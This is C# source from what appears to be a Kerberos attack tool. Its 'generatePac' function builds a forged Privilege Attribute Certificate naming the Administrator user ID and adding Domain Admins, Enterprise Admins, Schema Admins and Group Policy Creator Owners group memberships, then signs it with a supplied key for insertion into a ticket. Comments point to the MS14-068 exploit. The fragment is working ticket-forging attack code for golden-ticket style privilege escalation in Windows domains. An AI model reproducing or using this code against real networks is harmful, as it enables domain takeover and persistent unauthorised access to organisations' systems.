private static void DecodeAsAdIfRelevant(byte[] bytes, TreeNode parentNode)
{
var seq = KrbAuthorizationDataSequence.Decode(bytes);
foreach (var authz in seq.AuthorizationData)
{
ExplodeObject(authz, "AuthorizationData", parentNode);
}
}
public KerbAuthDataTokenRestriction(KrbAuthorizationData authz)
: base(authz.Type, AuthorizationDataType.KerbAuthDataTokenRestrictions)
{
var restriction = KrbAuthorizationDataSequence.Decode(authz.Data);
foreach (var data in restriction.AuthorizationData)
{
RestrictionType = (int)data.Type;
Restriction = new LsapTokenInfoIntegrity(data.Data.ToArray());
break;
}
}
//KDC KRB_AP_ERR_MODIFIED: Message stream modified
//During TGS processing, the KDC was unable to verify the signature on the PAC from krbtgt. This indicates the PAC was modified.
//Kerberos PAC Validation
//https://docs.microsoft.com/en-us/archive/blogs/openspecification/understanding-microsoft-kerberos-pac-validation
public static KrbAuthorizationData[] generatePac(string username, string domainsid, string domainname, KerberosKey key, DateTime now,
int userid = 500)
{
Console.WriteLine("[*] Building PAC ...");
//////////////Build PAC
var forgedPac = new PrivilegedAttributeCertificate();
////////////////
//https://github.com/SecWiki/windows-kernel-exploits/blob/5593d65dcb94696242687904b55f4e27ce33f235/MS14-068/pykek/kek/pac.py#L56
//PAC_LOGON_INFO
var logonInfo = new PacLogonInfo();
// LogonTime
logonInfo.LogonTime = RpcFileTime.Convert(now);
// LogoffTime
///logonInfo.LogoffTime = RpcFileTime.Convert(DateTime.MinValue);
// KickOffTime
//logonInfo.KickOffTime = RpcFileTime.Convert(DateTime.MinValue);
// PasswordLastSet
//logonInfo.PwdLastChangeTime = RpcFileTime.Convert(DateTime.Now.AddDays(-22));
// PasswordCanChange
//logonInfo.PwdCanChangeTime = RpcFileTime.Convert(DateTime.Now.AddDays(-21));
// PasswordMustChange
//logonInfo.PwdMustChangeTime = RpcFileTime.Convert(DateTime.MinValue);
// EffectiveName
logonInfo.UserName = username;
// FullName
//logonInfo.UserDisplayName = null;
// LogonScript
//logonInfo.LogonScript = "";
// ProfilePath
//logonInfo.ProfilePath = "";
// HomeDirectory
//logonInfo.HomeDirectory = "";
// HomeDirectoryDrive
//logonInfo.HomeDrive = "";
// LogonCount
//logonInfo.LogonCount = 0;
// BadPasswordCount
//logonInfo.BadPasswordCount = 0;
// UserId
logonInfo.UserId = (uint)userid;
// PrimaryGroupId
logonInfo.GroupId = 513;
// GroupCount
// GroupIds[0]
var se_group_all = SidAttributes.SE_GROUP_ENABLED |
SidAttributes.SE_GROUP_ENABLED_BY_DEFAULT |
SidAttributes.SE_GROUP_INTEGRITY |
SidAttributes.SE_GROUP_INTEGRITY_ENABLED |
SidAttributes.SE_GROUP_LOGON_ID |
SidAttributes.SE_GROUP_MANDATORY |
SidAttributes.SE_GROUP_OWNER |
SidAttributes.SE_GROUP_RESOURCE;
//SidAttributes.SE_GROUP_USE_FOR_DENY_ONLY;
IEnumerable <GroupMembership> groupIds = new GroupMembership[]
{
new GroupMembership()
{
Attributes = se_group_all,
RelativeId = 513
},
new GroupMembership()
{
Attributes = se_group_all,
RelativeId = 512
},
new GroupMembership()
{
Attributes = se_group_all,
RelativeId = 520
},
new GroupMembership()
{
Attributes = se_group_all,
RelativeId = 518
},
new GroupMembership()
{
Attributes = se_group_all,
RelativeId = 519
},
};
logonInfo.GroupIds = groupIds;
// UserFlags
logonInfo.UserFlags = UserFlags.LOGON_EXTRA_SIDS;
// UserSessionKey
string userSessKeyStr = "00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00";
byte[] keyByte = Array.ConvertAll <string, byte>(userSessKeyStr.Split('-'), s => Convert.ToByte(s, 16));
logonInfo.UserSessionKey = keyByte.ToArray().AsMemory();
// LogonServer
//logonInfo.ServerName = "";
// LogonDomainName
logonInfo.DomainName = domainname.ToUpper();//domainname.Split('.')[0].ToUpper();
// LogonDomainId
domainsid = domainsid.Replace("S-1-5-", string.Empty);
var subCount = domainsid.Split('-').Length;
uint[] subAuth = new uint[subCount];
for (int i = 0; i < subCount; i++)
{
subAuth[i] = uint.Parse(domainsid.Split('-')[i]);
}
var identAuth = new byte[6];
identAuth[5] = (int)IdentifierAuthority.NTAuthority;
logonInfo.DomainId = new RpcSid()
{
IdentifierAuthority = new RpcSidIdentifierAuthority()
{
IdentifierAuthority = identAuth
},
SubAuthority = subAuth.AsMemory(),
SubAuthorityCount = (byte)subCount,
Revision = 1
};
// Reserved1
int[] reserved1 = { 0, 0 };
logonInfo.Reserved1 = reserved1.ToArray().AsMemory();
// UserAccountControl
logonInfo.UserAccountControl = UserAccountControlFlags.ADS_UF_NORMAL_ACCOUNT |
UserAccountControlFlags.ADS_UF_LOCKOUT;
// SubAuthStatus
logonInfo.SubAuthStatus = 0;
// LastSuccessFulILogon
logonInfo.LastSuccessfulILogon = RpcFileTime.Convert(new DateTime(1601, 1, 1, 12, 00, 00));
// LastFailedILogon
logonInfo.LastFailedILogon = RpcFileTime.Convert(new DateTime(1601, 1, 1, 12, 00, 00));
// FailedILogonCount
logonInfo.FailedILogonCount = 0;
// Reserved3
logonInfo.Reserved3 = 0;
// SidCount
// ExtraSids
// ResourceGroupDomainSid
// ResourceGroupCount
// ResourceGroupIdss
//logonInfo.ResourceGroupIds = null;// new GroupMembership[] { };
// ExtraIds
//RpcSidAttributes[] extraIds =
//{
// new RpcSidAttributes()
// {
// Sid = new RpcSid()
// {
// IdentifierAuthority = new RpcSidIdentifierAuthority(){},
// Revision = 1,
// //SubAuthority = a.ToArray().AsMemory()
// },
// Attributes = se_group_all
// }
//};
//logonInfo.ExtraIds = extraIds;
//logonInfo.ResourceGroupIds = new GroupMembership[] { };
forgedPac.LogonInfo = logonInfo;
////////////////
//PAC_CLIENT_INFO
var clientInformation = new PacClientInfo()
{
Name = username,
ClientId = RpcFileTime.Convert(now),
};
forgedPac.ClientInformation = clientInformation;
//From Book: Network Security Assessment Table 7-26
//TGT: PAC (KDC) -> krbtgt
// PAC (Server) -> krbtgt
var authz = new List <KrbAuthorizationData>();
var sequence = new KrbAuthorizationDataSequence
{
AuthorizationData = new[]
{
new KrbAuthorizationData
{
Type = AuthorizationDataType.AdWin2kPac,
Data = forgedPac.Encode(key, key)
}
}
};
authz.Add(
new KrbAuthorizationData
{
Type = AuthorizationDataType.AdIfRelevant,
Data = sequence.Encode()
});
return(authz.ToArray());
}
